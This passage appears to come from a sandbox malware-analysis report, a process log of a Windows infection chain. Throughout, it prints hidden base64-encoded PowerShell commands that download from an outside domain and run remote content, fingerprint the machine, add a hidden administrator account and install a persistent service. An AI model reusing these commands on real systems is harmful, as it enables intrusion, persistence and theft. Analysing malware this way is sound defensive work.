QAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\About-Us.docx.docx" /o ""
      Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: unknownProcess created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAEBA.tmp" "c:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\About-Us.docx.docx" /o ""Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 